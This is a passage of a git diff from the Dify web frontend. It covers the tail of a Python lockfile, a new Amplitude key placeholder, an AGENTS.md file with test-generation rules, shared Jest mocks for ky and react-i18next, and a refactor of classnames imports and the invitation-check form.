"sha256:e31d432427dcbf4d86958c184b9bfd1e96b5b71f8eb17e6d02531f434fd335b8", size = 245859, upload-time = "2025-10-08T22:01:13.551Z" }, - { url = "https://files.pythonhosted.org/packages/fb/a1/4d6865da6a71c603cfe6ad0e6556c73c76548557a8d658f9e3b142df245f/tomli-2.3.0-cp312-cp312-musllinux_1_2_x86_64.whl", hash = "sha256:7b0882799624980785240ab732537fcfc372601015c00f7fc367c55308c186f6", size = 250296, upload-time = "2025-10-08T22:01:14.614Z" }, - { url = "https://files.pythonhosted.org/packages/a0/b7/a7a7042715d55c9ba6e8b196d65d2cb662578b4d8cd17d882d45322b0d78/tomli-2.3.0-cp312-cp312-win32.whl", hash = "sha256:ff72b71b5d10d22ecb084d345fc26f42b5143c5533db5e2eaba7d2d335358876", size = 97124, upload-time = "2025-10-08T22:01:15.629Z" }, - { url = "https://files.pythonhosted.org/packages/06/1e/f22f100db15a68b520664eb3328fb0ae4e90530887928558112c8d1f4515/tomli-2.3.0-cp312-cp312-win_amd64.whl", hash = "sha256:1cb4ed918939151a03f33d4242ccd0aa5f11b3547d0cf30f7c74a408a5b99878", size = 107698, upload-time = "2025-10-08T22:01:16.51Z" }, - { url = "https://files.pythonhosted.org/packages/89/48/06ee6eabe4fdd9ecd48bf488f4ac783844fd777f547b8d1b61c11939974e/tomli-2.3.0-cp313-cp313-macosx_10_13_x86_64.whl", hash = "sha256:5192f562738228945d7b13d4930baffda67b69425a7f0da96d360b0a3888136b", size = 154819, upload-time = "2025-10-08T22:01:17.964Z" }, - { url = "https://files.pythonhosted.org/packages/f1/01/88793757d54d8937015c75dcdfb673c65471945f6be98e6a0410fba167ed/tomli-2.3.0-cp313-cp313-macosx_11_0_arm64.whl", hash = "sha256:be71c93a63d738597996be9528f4abe628d1adf5e6eb11607bc8fe1a510b5dae", size = 148766, upload-time = "2025-10-08T22:01:18.959Z" }, - { url = "https://files.pythonhosted.org/packages/42/17/5e2c956f0144b812e7e107f94f1cc54af734eb17b5191c0bbfb72de5e93e/tomli-2.3.0-cp313-cp313-manylinux2014_aarch64.manylinux_2_17_aarch64.manylinux_2_28_aarch64.whl", hash = "sha256:c4665508bcbac83a31ff8ab08f424b665200c0e1e645d2bd9ab3d3e557b6185b", size = 240771, upload-time = "2025-10-08T22:01:20.106Z" }, - { url = "https://files.pythonhosted.org/packages/d5/f4/0fbd014909748706c01d16824eadb0307115f9562a15cbb012cd9b3512c5/tomli-2.3.0-cp313-cp313-manylinux2014_x86_64.manylinux_2_17_x86_64.manylinux_2_28_x86_64.whl", hash = "sha256:4021923f97266babc6ccab9f5068642a0095faa0a51a246a6a02fccbb3514eaf", size = 248586, upload-time = "2025-10-08T22:01:21.164Z" }, - { url = "https://files.pythonhosted.org/packages/30/77/fed85e114bde5e81ecf9bc5da0cc69f2914b38f4708c80ae67d0c10180c5/tomli-2.3.0-cp313-cp313-musllinux_1_2_aarch64.whl", hash = "sha256:a4ea38c40145a357d513bffad0ed869f13c1773716cf71ccaa83b0fa0cc4e42f", size = 244792, upload-time = "2025-10-08T22:01:22.417Z" }, - { url = "https://files.pythonhosted.org/packages/55/92/afed3d497f7c186dc71e6ee6d4fcb0acfa5f7d0a1a2878f8beae379ae0cc/tomli-2.3.0-cp313-cp313-musllinux_1_2_x86_64.whl", hash = "sha256:ad805ea85eda330dbad64c7ea7a4556259665bdf9d2672f5dccc740eb9d3ca05", size = 248909, upload-time = "2025-10-08T22:01:23.859Z" }, - { url = "https://files.pythonhosted.org/packages/f8/84/ef50c51b5a9472e7265ce1ffc7f24cd4023d289e109f669bdb1553f6a7c2/tomli-2.3.0-cp313-cp313-win32.whl", hash = "sha256:97d5eec30149fd3294270e889b4234023f2c69747e555a27bd708828353ab606", size = 96946, upload-time = "2025-10-08T22:01:24.893Z" }, - { url = "https://files.pythonhosted.org/packages/b2/b7/718cd1da0884f281f95ccfa3a6cc572d30053cba64603f79d431d3c9b61b/tomli-2.3.0-cp313-cp313-win_amd64.whl", hash = "sha256:0c95ca56fbe89e065c6ead5b593ee64b84a26fca063b5d71a1122bf26e533999", size = 107705, upload-time = "2025-10-08T22:01:26.153Z" }, - { url = "https://files.pythonhosted.org/packages/19/94/aeafa14a52e16163008060506fcb6aa1949d13548d13752171a755c65611/tomli-2.3.0-cp314-cp314-macosx_10_13_x86_64.whl", hash = "sha256:cebc6fe843e0733ee827a282aca4999b596241195f43b4cc371d64fc6639da9e", size = 154244, upload-time = "2025-10-08T22:01:27.06Z" }, - { url = "https://files.pythonhosted.org/packages/db/e4/1e58409aa78eefa47ccd19779fc6f36787edbe7d4cd330eeeedb33a4515b/tomli-2.3.0-cp314-cp314-macosx_11_0_arm64.whl", hash = "sha256:4c2ef0244c75aba9355561272009d934953817c49f47d768070c3c94355c2aa3", size = 148637, upload-time = "2025-10-08T22:01:28.059Z" }, - { url = "https://files.pythonhosted.org/packages/26/b6/d1eccb62f665e44359226811064596dd6a366ea1f985839c566cd61525ae/tomli-2.3.0-cp314-cp314-manylinux2014_aarch64.manylinux_2_17_aarch64.manylinux_2_28_aarch64.whl", hash = "sha256:c22a8bf253bacc0cf11f35ad9808b6cb75ada2631c2d97c971122583b129afbc", size = 241925, upload-time = "2025-10-08T22:01:29.066Z" }, - { url = "https://files.pythonhosted.org/packages/70/91/7cdab9a03e6d3d2bb11beae108da5bdc1c34bdeb06e21163482544ddcc90/tomli-2.3.0-cp314-cp314-manylinux2014_x86_64.manylinux_2_17_x86_64.manylinux_2_28_x86_64.whl", hash = "sha256:0eea8cc5c5e9f89c9b90c4896a8deefc74f518db5927d0e0e8d4a80953d774d0", size = 249045, upload-time = "2025-10-08T22:01:31.98Z" }, - { url = "https://files.pythonhosted.org/packages/15/1b/8c26874ed1f6e4f1fcfeb868db8a794cbe9f227299402db58cfcc858766c/tomli-2.3.0-cp314-cp314-musllinux_1_2_aarch64.whl", hash = "sha256:b74a0e59ec5d15127acdabd75ea17726ac4c5178ae51b85bfe39c4f8a278e879", size = 245835, upload-time = "2025-10-08T22:01:32.989Z" }, - { url = "https://files.pythonhosted.org/packages/fd/42/8e3c6a9a4b1a1360c1a2a39f0b972cef2cc9ebd56025168c4137192a9321/tomli-2.3.0-cp314-cp314-musllinux_1_2_x86_64.whl", hash = "sha256:b5870b50c9db823c595983571d1296a6ff3e1b88f734a4c8f6fc6188397de005", size = 253109, upload-time = "2025-10-08T22:01:34.052Z" }, - { url = "https://files.pythonhosted.org/packages/22/0c/b4da635000a71b5f80130937eeac12e686eefb376b8dee113b4a582bba42/tomli-2.3.0-cp314-cp314-win32.whl", hash = "sha256:feb0dacc61170ed7ab602d3d972a58f14ee3ee60494292d384649a3dc38ef463", size = 97930, upload-time = "2025-10-08T22:01:35.082Z" }, - { url = "https://files.pythonhosted.org/packages/b9/74/cb1abc870a418ae99cd5c9547d6bce30701a954e0e721821df483ef7223c/tomli-2.3.0-cp314-cp314-win_amd64.whl", hash = "sha256:b273fcbd7fc64dc3600c098e39136522650c49bca95df2d11cf3b626422392c8", size = 107964, upload-time = "2025-10-08T22:01:36.057Z" }, - { url = "https://files.pythonhosted.org/packages/54/78/5c46fff6432a712af9f792944f4fcd7067d8823157949f4e40c56b8b3c83/tomli-2.3.0-cp314-cp314t-macosx_10_13_x86_64.whl", hash = "sha256:940d56ee0410fa17ee1f12b817b37a4d4e4dc4d27340863cc67236c74f582e77", size = 163065, upload-time = "2025-10-08T22:01:37.27Z" }, - { url = "https://files.pythonhosted.org/packages/39/67/f85d9bd23182f45eca8939cd2bc7050e1f90c41f4a2ecbbd5963a1d1c486/tomli-2.3.0-cp314-cp314t-macosx_11_0_arm64.whl", hash = "sha256:f85209946d1fe94416debbb88d00eb92ce9cd5266775424ff81bc959e001acaf", size = 159088, upload-time = "2025-10-08T22:01:38.235Z" }, - { url = "https://files.pythonhosted.org/packages/26/5a/4b546a0405b9cc0659b399f12b6adb750757baf04250b148d3c5059fc4eb/tomli-2.3.0-cp314-cp314t-manylinux2014_aarch64.manylinux_2_17_aarch64.manylinux_2_28_aarch64.whl", hash = "sha256:a56212bdcce682e56b0aaf79e869ba5d15a6163f88d5451cbde388d48b13f530", size = 268193, upload-time = "2025-10-08T22:01:39.712Z" }, - { url = "https://files.pythonhosted.org/packages/42/4f/2c12a72ae22cf7b59a7fe75b3465b7aba40ea9145d026ba41cb382075b0e/tomli-2.3.0-cp314-cp314t-manylinux2014_x86_64.manylinux_2_17_x86_64.manylinux_2_28_x86_64.whl", hash = "sha256:c5f3ffd1e098dfc032d4d3af5c0ac64f6d286d98bc148698356847b80fa4de1b", size = 275488, upload-time = "2025-10-08T22:01:40.773Z" }, - { url = "https://files.pythonhosted.org/packages/92/04/a038d65dbe160c3aa5a624e93ad98111090f6804027d474ba9c37c8ae186/tomli-2.3.0-cp314-cp314t-musllinux_1_2_aarch64.whl", hash = "sha256:5e01decd096b1530d97d5d85cb4dff4af2d8347bd35686654a004f8dea20fc67", size = 272669, upload-time = "2025-10-08T22:01:41.824Z" }, - { url = "https://files.pythonhosted.org/packages/be/2f/8b7c60a9d1612a7cbc39ffcca4f21a73bf368a80fc25bccf8253e2563267/tomli-2.3.0-cp314-cp314t-musllinux_1_2_x86_64.whl", hash = "sha256:8a35dd0e643bb2610f156cca8db95d213a90015c11fee76c946aa62b7ae7e02f", size = 279709, upload-time = "2025-10-08T22:01:43.177Z" }, - { url = "https://files.pythonhosted.org/packages/7e/46/cc36c679f09f27ded940281c38607716c86cf8ba4a518d524e349c8b4874/tomli-2.3.0-cp314-cp314t-win32.whl", hash = "sha256:a1f7f282fe248311650081faafa5f4732bdbfef5d45fe3f2e702fbc6f2d496e0", size = 107563, upload-time = "2025-10-08T22:01:44.233Z" }, - { url = "https://files.pythonhosted.org/packages/84/ff/426ca8683cf7b753614480484f6437f568fd2fda2edbdf57a2d3d8b27a0b/tomli-2.3.0-cp314-cp314t-win_amd64.whl", hash = "sha256:70a251f8d4ba2d9ac2542eecf008b3c8a9fc5c3f9f02c56a9d7952612be2fdba", size = 119756, upload-time = "2025-10-08T22:01:45.234Z" }, - { url = "https://files.pythonhosted.org/packages/77/b8/0135fadc89e73be292b473cb820b4f5a08197779206b33191e801feeae40/tomli-2.3.0-py3-none-any.whl", hash = "sha256:e95b1af3c5b07d9e643909b5abbec77cd9f1217e6d0bca72b0234736b9fb1f1b", size = 14408, upload-time = "2025-10-08T22:01:46.04Z" }, -] - -[[package]] -name = "typing-extensions" -version = "4.15.0" -source = { registry = "https://pypi.org/simple" } -sdist = { url = "https://files.pythonhosted.org/packages/72/94/1a15dd82efb362ac84269196e94cf00f187f7ed21c242792a923cdb1c61f/typing_extensions-4.15.0.tar.gz", hash = "sha256:0cea48d173cc12fa28ecabc3b837ea3cf6f38c6d1136f85cbaaf598984861466", size = 109391, upload-time = "2025-08-25T13:49:26.313Z" } -wheels = [ - { url = "https://files.pythonhosted.org/packages/18/67/36e9267722cc04a6b9f15c7f3441c2363321a3ea07da7ae0c0707beb2a9c/typing_extensions-4.15.0-py3-none-any.whl", hash = "sha256:f0fa19c6845758ab08074a0cfa8b7aecb71c999ca73d62883bc25cc018c4e548", size = 44614, upload-time = "2025-08-25T13:49:24.86Z" }, -] diff --git a/web/.env.example b/web/.env.example index eff6f77fd9..b488c31057 100644 --- a/web/.env.example +++ b/web/.env.example @@ -70,3 +70,6 @@ NEXT_PUBLIC_ENABLE_SINGLE_DOLLAR_LATEX=false # The maximum number of tree node depth for workflow NEXT_PUBLIC_MAX_TREE_DEPTH=50 + +# The API key of amplitude +NEXT_PUBLIC_AMPLITUDE_API_KEY= diff --git a/.cursorrules b/web/AGENTS.md similarity index 61% rename from .cursorrules rename to web/AGENTS.md index cdfb8b17a3..7362cd51db 100644 --- a/.cursorrules +++ b/web/AGENTS.md @@ -1,6 +1,5 @@ -# Cursor Rules for Dify Project - ## Automated Test Generation - Use `web/testing/testing.md` as the canonical instruction set for generating frontend automated tests. - When proposing or saving tests, re-read that document and follow every requirement. +- All frontend tests MUST also comply with the `frontend-testing` skill. Treat the skill as a mandatory constraint, not optional guidance. diff --git a/web/CLAUDE.md b/web/CLAUDE.md new file mode 120000 index 0000000000..47dc3e3d86 --- /dev/null +++ b/web/CLAUDE.md @@ -0,0 +1 @@ +AGENTS.md \ No newline at end of file diff --git a/web/__mocks__/ky.ts b/web/__mocks__/ky.ts new file mode 100644 index 0000000000..6c7691f2cf --- /dev/null +++ b/web/__mocks__/ky.ts @@ -0,0 +1,71 @@ +/** + * Mock for ky HTTP client + * This mock is used to avoid ESM issues in Jest tests + */ + +type KyResponse = { + ok: boolean + status: number + statusText: string + headers: Headers + json: jest.Mock + text: jest.Mock + blob: jest.Mock + arrayBuffer: jest.Mock + clone: jest.Mock +} + +type KyInstance = jest.Mock & { + get: jest.Mock + post: jest.Mock + put: jest.Mock + patch: jest.Mock + delete: jest.Mock + head: jest.Mock + create: jest.Mock + extend: jest.Mock + stop: symbol +} + +const createResponse = (data: unknown = {}, status = 200): KyResponse => { + const response: KyResponse = { + ok: status >= 200 && status < 300, + status, + statusText: status === 200 ? 'OK' : 'Error', + headers: new Headers(), + json: jest.fn().mockResolvedValue(data), + text: jest.fn().mockResolvedValue(JSON.stringify(data)), + blob: jest.fn().mockResolvedValue(new Blob()), + arrayBuffer: jest.fn().mockResolvedValue(new ArrayBuffer(0)), + clone: jest.fn(), + } + // Ensure clone returns a new response-like object, not the same instance + response.clone.mockImplementation(() => createResponse(data, status)) + return response +} + +const createKyInstance = (): KyInstance => { + const instance = jest.fn().mockImplementation(() => Promise.resolve(createResponse())) as KyInstance + + // HTTP methods + instance.get = jest.fn().mockImplementation(() => Promise.resolve(createResponse())) + instance.post = jest.fn().mockImplementation(() => Promise.resolve(createResponse())) + instance.put = jest.fn().mockImplementation(() => Promise.resolve(createResponse())) + instance.patch = jest.fn().mockImplementation(() => Promise.resolve(createResponse())) + instance.delete = jest.fn().mockImplementation(() => Promise.resolve(createResponse())) + instance.head = jest.fn().mockImplementation(() => Promise.resolve(createResponse())) + + // Create new instance with custom options + instance.create = jest.fn().mockImplementation(() => createKyInstance()) + instance.extend = jest.fn().mockImplementation(() => createKyInstance()) + + // Stop method for AbortController + instance.stop = Symbol('stop') + + return instance +} + +const ky = createKyInstance() + +export default ky +export { ky } diff --git a/web/__mocks__/react-i18next.ts b/web/__mocks__/react-i18next.ts new file mode 100644 index 0000000000..1e3f58927e --- /dev/null +++ b/web/__mocks__/react-i18next.ts @@ -0,0 +1,40 @@ +/** + * Shared mock for react-i18next + * + * Jest automatically uses this mock when react-i18next is imported in tests. + * The default behavior returns the translation key as-is, which is suitable + * for most test scenarios. + * + * For tests that need custom translations, you can override with jest.mock(): + * + * @example + * jest.mock('react-i18next', () => ({ + * useTranslation: () => ({ + * t: (key: string) => { + * if (key === 'some.key') return 'Custom translation' + * return key + * }, + * }), + * })) + */ + +export const useTranslation = () => ({ + t: (key: string, options?: Record) => { + if (options?.returnObjects) + return [`${key}-feature-1`, `${key}-feature-2`] + if (options) + return `${key}:${JSON.stringify(options)}` + return key + }, + i18n: { + language: 'en', + changeLanguage: jest.fn(), + }, +}) + +export const Trans = ({ children }: { children?: React.ReactNode }) => children + +export const initReactI18next = { + type: '3rdParty', + init: jest.fn(), +} diff --git a/web/__tests__/embedded-user-id-auth.test.tsx b/web/__tests__/embedded-user-id-auth.test.tsx index 5c3c3c943f..9d6734b120 100644 --- a/web/__tests__/embedded-user-id-auth.test.tsx +++ b/web/__tests__/embedded-user-id-auth.test.tsx @@ -4,12 +4,6 @@ import { fireEvent, render, screen, waitFor } from '@testing-library/react' import MailAndPasswordAuth from '@/app/(shareLayout)/webapp-signin/components/mail-and-password-auth' import CheckCode from '@/app/(shareLayout)/webapp-signin/check-code/page' -jest.mock('react-i18next', () => ({ - useTranslation: () => ({ - t: (key: string) => key, - }), -})) - const replaceMock = jest.fn() const backMock = jest.fn() diff --git a/web/__tests__/goto-anything/command-selector.test.tsx b/web/__tests__/goto-anything/command-selector.test.tsx index 6d4e045d49..e502c533bb 100644 --- a/web/__tests__/goto-anything/command-selector.test.tsx +++ b/web/__tests__/goto-anything/command-selector.test.tsx @@ -4,12 +4,6 @@ import '@testing-library/jest-dom' import CommandSelector from '../../app/components/goto-anything/command-selector' import type { ActionItem } from '../../app/components/goto-anything/actions/types' -jest.mock('react-i18next', () => ({ - useTranslation: () => ({ - t: (key: string) => key, - }), -})) - jest.mock('cmdk', () => ({ Command: { Group: ({ children, className }: any) =>
{children}
, diff --git a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/layout-main.tsx b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/layout-main.tsx index 1f836de6e6..d5e3c61932 100644 --- a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/layout-main.tsx +++ b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/layout-main.tsx @@ -16,7 +16,7 @@ import { import { useTranslation } from 'react-i18next' import { useShallow } from 'zustand/react/shallow' import s from './style.module.css' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { useStore } from '@/app/components/app/store' import AppSideBar from '@/app/components/app-sidebar' import type { NavIcon } from '@/app/components/app-sidebar/navLink' diff --git a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/time-range-picker/date-picker.tsx b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/time-range-picker/date-picker.tsx index 2bfdece433..dda5dff2b9 100644 --- a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/time-range-picker/date-picker.tsx +++ b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/time-range-picker/date-picker.tsx @@ -3,7 +3,7 @@ import { RiCalendarLine } from '@remixicon/react' import type { Dayjs } from 'dayjs' import type { FC } from 'react' import React, { useCallback } from 'react' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { formatToLocalTime } from '@/utils/format' import { useI18N } from '@/context/i18n' import Picker from '@/app/components/base/date-and-time-picker/date-picker' diff --git a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/time-range-picker/range-selector.tsx b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/time-range-picker/range-selector.tsx index f99ea52492..0a80bf670d 100644 --- a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/time-range-picker/range-selector.tsx +++ b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/time-range-picker/range-selector.tsx @@ -6,7 +6,7 @@ import { SimpleSelect } from '@/app/components/base/select' import type { Item } from '@/app/components/base/select' import dayjs from 'dayjs' import { RiArrowDownSLine, RiCheckLine } from '@remixicon/react' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { useTranslation } from 'react-i18next' const today = dayjs() diff --git a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/__tests__/svg-attribute-error-reproduction.spec.tsx b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/__tests__/svg-attribute-error-reproduction.spec.tsx index b1e915b2bf..374dbff203 100644 --- a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/__tests__/svg-attribute-error-reproduction.spec.tsx +++ b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/__tests__/svg-attribute-error-reproduction.spec.tsx @@ -3,13 +3,6 @@ import { render } from '@testing-library/react' import '@testing-library/jest-dom' import { OpikIconBig } from '@/app/components/base/icons/src/public/tracing' -// Mock dependencies to isolate the SVG rendering issue -jest.mock('react-i18next', () => ({ - useTranslation: () => ({ - t: (key: string) => key, - }), -})) - describe('SVG Attribute Error Reproduction', () => { // Capture console errors const originalError = console.error diff --git a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/config-button.tsx b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/config-button.tsx index 246a1eb6a3..17c919bf22 100644 --- a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/config-button.tsx +++ b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/config-button.tsx @@ -4,7 +4,7 @@ import React, { useCallback, useRef, useState } from 'react' import type { PopupProps } from './config-popup' import ConfigPopup from './config-popup' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { PortalToFollowElem, PortalToFollowElemContent, diff --git a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/config-popup.tsx b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/config-popup.tsx index 628eb13071..767ccb8c59 100644 --- a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/config-popup.tsx +++ b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/config-popup.tsx @@ -12,7 +12,7 @@ import Indicator from '@/app/components/header/indicator' import Switch from '@/app/components/base/switch' import Tooltip from '@/app/components/base/tooltip' import Divider from '@/app/components/base/divider' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' const I18N_PREFIX = 'app.tracing' diff --git a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/field.tsx b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/field.tsx index eecd356e08..e170159e35 100644 --- a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/field.tsx +++ b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/field.tsx @@ -1,7 +1,7 @@ 'use client' import type { FC } from 'react' import React from 'react' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import Input from '@/app/components/base/input' type Props = { diff --git a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/panel.tsx b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/panel.tsx index 2c17931b83..319ff3f423 100644 --- a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/panel.tsx +++ b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/panel.tsx @@ -12,7 +12,7 @@ import type { AliyunConfig, ArizeConfig, DatabricksConfig, LangFuseConfig, LangS import { TracingProvider } from './type' import TracingIcon from './tracing-icon' import ConfigButton from './config-button' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { AliyunIcon, ArizeIcon, DatabricksIcon, LangfuseIcon, LangsmithIcon, MlflowIcon, OpikIcon, PhoenixIcon, TencentIcon, WeaveIcon } from '@/app/components/base/icons/src/public/tracing' import Indicator from '@/app/components/header/indicator' import { fetchTracingConfig as doFetchTracingConfig, fetchTracingStatus, updateTracingStatus } from '@/service/apps' diff --git a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/provider-panel.tsx b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/provider-panel.tsx index ac1704d60d..0779689c76 100644 --- a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/provider-panel.tsx +++ b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/provider-panel.tsx @@ -6,7 +6,7 @@ import { } from '@remixicon/react' import { useTranslation } from 'react-i18next' import { TracingProvider } from './type' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { AliyunIconBig, ArizeIconBig, DatabricksIconBig, LangfuseIconBig, LangsmithIconBig, MlflowIconBig, OpikIconBig, PhoenixIconBig, TencentIconBig, WeaveIconBig } from '@/app/components/base/icons/src/public/tracing' import { Eye as View } from '@/app/components/base/icons/src/vender/solid/general' diff --git a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/tracing-icon.tsx b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/tracing-icon.tsx index ec9117dd38..aeca1cd3ab 100644 --- a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/tracing-icon.tsx +++ b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/tracing-icon.tsx @@ -1,7 +1,7 @@ 'use client' import type { FC } from 'react' import React from 'react' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { TracingIcon as Icon } from '@/app/components/base/icons/src/public/tracing' type Props = { diff --git a/web/app/(commonLayout)/datasets/(datasetDetailLayout)/[datasetId]/layout-main.tsx b/web/app/(commonLayout)/datasets/(datasetDetailLayout)/[datasetId]/layout-main.tsx index 3effb79f20..3581587b54 100644 --- a/web/app/(commonLayout)/datasets/(datasetDetailLayout)/[datasetId]/layout-main.tsx +++ b/web/app/(commonLayout)/datasets/(datasetDetailLayout)/[datasetId]/layout-main.tsx @@ -23,7 +23,7 @@ import { useDatasetDetail, useDatasetRelatedApps } from '@/service/knowledge/use import useDocumentTitle from '@/hooks/use-document-title' import ExtraInfo from '@/app/components/datasets/extra-info' import { useEventEmitterContextContext } from '@/context/event-emitter' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' export type IAppDetailLayoutProps = { children: React.ReactNode diff --git a/web/app/(shareLayout)/webapp-reset-password/layout.tsx b/web/app/(shareLayout)/webapp-reset-password/layout.tsx index e0ac6b9ad6..13073b0e6a 100644 --- a/web/app/(shareLayout)/webapp-reset-password/layout.tsx +++ b/web/app/(shareLayout)/webapp-reset-password/layout.tsx @@ -1,7 +1,7 @@ 'use client' import Header from '@/app/signin/_header' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { useGlobalPublicStore } from '@/context/global-public-context' export default function SignInLayout({ children }: any) { diff --git a/web/app/(shareLayout)/webapp-reset-password/set-password/page.tsx b/web/app/(shareLayout)/webapp-reset-password/set-password/page.tsx index 5e3f6fff1d..843f10e039 100644 --- a/web/app/(shareLayout)/webapp-reset-password/set-password/page.tsx +++ b/web/app/(shareLayout)/webapp-reset-password/set-password/page.tsx @@ -2,7 +2,7 @@ import { useCallback, useState } from 'react' import { useTranslation } from 'react-i18next' import { useRouter, useSearchParams } from 'next/navigation' -import cn from 'classnames' +import { cn } from '@/utils/classnames' import { RiCheckboxCircleFill } from '@remixicon/react' import { useCountDown } from 'ahooks' import Button from '@/app/components/base/button' diff --git a/web/app/(shareLayout)/webapp-signin/layout.tsx b/web/app/(shareLayout)/webapp-signin/layout.tsx index 7649982072..c75f925d40 100644 --- a/web/app/(shareLayout)/webapp-signin/layout.tsx +++ b/web/app/(shareLayout)/webapp-signin/layout.tsx @@ -1,6 +1,6 @@ 'use client' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { useGlobalPublicStore } from '@/context/global-public-context' import useDocumentTitle from '@/hooks/use-document-title' import type { PropsWithChildren } from 'react' diff --git a/web/app/(shareLayout)/webapp-signin/normalForm.tsx b/web/app/(shareLayout)/webapp-signin/normalForm.tsx index 219722eef3..a14bfcd737 100644 --- a/web/app/(shareLayout)/webapp-signin/normalForm.tsx +++ b/web/app/(shareLayout)/webapp-signin/normalForm.tsx @@ -7,7 +7,7 @@ import Loading from '@/app/components/base/loading' import MailAndCodeAuth from './components/mail-and-code-auth' import MailAndPasswordAuth from './components/mail-and-password-auth' import SSOAuth from './components/sso-auth' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { LicenseStatus } from '@/types/feature' import { IS_CE_EDITION } from '@/config' import { useGlobalPublicStore } from '@/context/global-public-context' diff --git a/web/app/account/oauth/authorize/layout.tsx b/web/app/account/oauth/authorize/layout.tsx index 2ab676d6b6..b70ab210d0 100644 --- a/web/app/account/oauth/authorize/layout.tsx +++ b/web/app/account/oauth/authorize/layout.tsx @@ -1,7 +1,7 @@ 'use client' import Header from '@/app/signin/_header' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { useGlobalPublicStore } from '@/context/global-public-context' import useDocumentTitle from '@/hooks/use-document-title' import { AppContextProvider } from '@/context/app-context' diff --git a/web/app/activate/activateForm.tsx b/web/app/activate/activateForm.tsx index d9d07cbfa1..11fc4866f3 100644 --- a/web/app/activate/activateForm.tsx +++ b/web/app/activate/activateForm.tsx @@ -1,13 +1,13 @@ 'use client' +import { useEffect } from 'react' import { useTranslation } from 'react-i18next' -import useSWR from 'swr' import { useRouter, useSearchParams } from 'next/navigation' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import Button from '@/app/components/base/button' -import { invitationCheck } from '@/service/common' import Loading from '@/app/components/base/loading' import useDocumentTitle from '@/hooks/use-document-title' +import { useInvitationCheck } from '@/service/use-common' const ActivateForm = () => { useDocumentTitle('') @@ -26,19 +26,21 @@ const ActivateForm = () => { token, }, } - const { data: checkRes } = useSWR(checkParams, invitationCheck, { - revalidateOnFocus: false, - onSuccess(data) { - if (data.is_valid) { - const params = new URLSearchParams(searchParams) - const { email, workspace_id } = data.data - params.set('email', encodeURIComponent(email)) - params.set('workspace_id', encodeURIComponent(workspace_id)) - params.set('invite_token', encodeURIComponent(token as string)) - router.replace(`/signin?${params.toString()}`) - } - }, - }) + const { data: checkRes } = useInvitationCheck({ + ...checkParams.params, + token: token || undefined, + }, true) + + useEffect(() => { + if (checkRes?.is_valid) { + const params = new URLSearchParams(searchParams) + const { email, workspace_id } = checkRes.data + params.set('email', encodeURIComponent(email)) + params.set('workspace_id', encodeURIComponent(workspace_id)) + params.set('invite_token', encodeURIComponent(token as string)) + router.replace(`/signin?${params.toString()}`) + } + }, [checkRes, router, searchParams, token]) return (
